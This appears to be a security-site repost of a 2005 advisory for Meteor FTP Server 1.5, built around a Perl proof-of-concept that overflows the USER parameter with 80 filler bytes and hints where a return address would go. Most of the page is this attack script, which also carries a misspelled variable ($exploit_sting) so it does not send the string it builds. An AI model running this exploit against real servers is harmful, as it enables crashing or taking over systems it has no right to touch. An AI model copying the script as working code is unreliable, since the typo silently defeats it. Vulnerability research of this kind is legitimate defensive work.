首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Meteor FTP Server Buffer Overflow
来源:http://acolytez.com 作者:k0r0l 发布时间:2005-05-31  

Meteor FTP Server Buffer Overflow (username)

Summary
Meteor FTP is "a personal FTP server designed for the Microsoft Windows 98 and Windows Millennium Edition operating systems".

A buffer overflow vulnerability exists in Meteor FTP Server's handling of the username parameter, the following exploit code can be used to determine whether your version of Meteor FTP server is vulnerable or not.

Credit:


Details
Vulnerable Systems:
* Meteor FTP Server version 1.5

#!/usr/bin/perl
#
# 47meteor_bof.pl - PoC exploit for Meteor FTP Server
# version 1.5
# bug found by Anix44@gmail.com
#
# coded by k0r0l from acolytez team
# visit http://acolytez.com for details
#

use Net::FTP;

# geting data
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
# ===========

$ftp_error = "Unable";

if (($host) && ($port))
{
# make exploit string
$exploit_string = "USER ";
$exploit_string .= "X"x80;
#$exploit_string .= "\n\n\n\n"; - it will be new return point !
# ===================

print "Trying to connect to $host:$port\n";
$sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug =>
$debug) or die "[-] Connection failed\n";
print "[+] Connect OK!\n";
print "Sending string...\n";
$sock->login($exploit_sting, "testpassword");
$answer = $sock->message;
if ($answer =~ m/$ftp_error/i)
{
print "\n[-] Sorry! Failed\n";
} else
{
print "\n[+] Send ok!\nServer can be explorated!\n\n";
}
}
else
{
print "\nMeteor FTP Server - PoC Exploit\n http://AcolyteZ.com\n\nUsing: $0 host port [debug: 1 or 0]\n\n";
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Exim Buffer Overflow Exploit
·Zeroboard 4.x preg_replace Rem
·Linux Cryptoloop Watermark Exp
·Microsoft Windows COM Structur
·MaxWebPortal Administrator Pas
·Ethereal <= 0.10.10 SIP Pro
·GLD Remote Format String Vulne
·phpStat Authentication Bypass
·Multiple Vendor TCP Timestamps
·IBM AIX invscout Local Exploit
·Mozilla Suite and Firefox Scri
·MyBulletinBoard(MyBB) SQL Inje
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved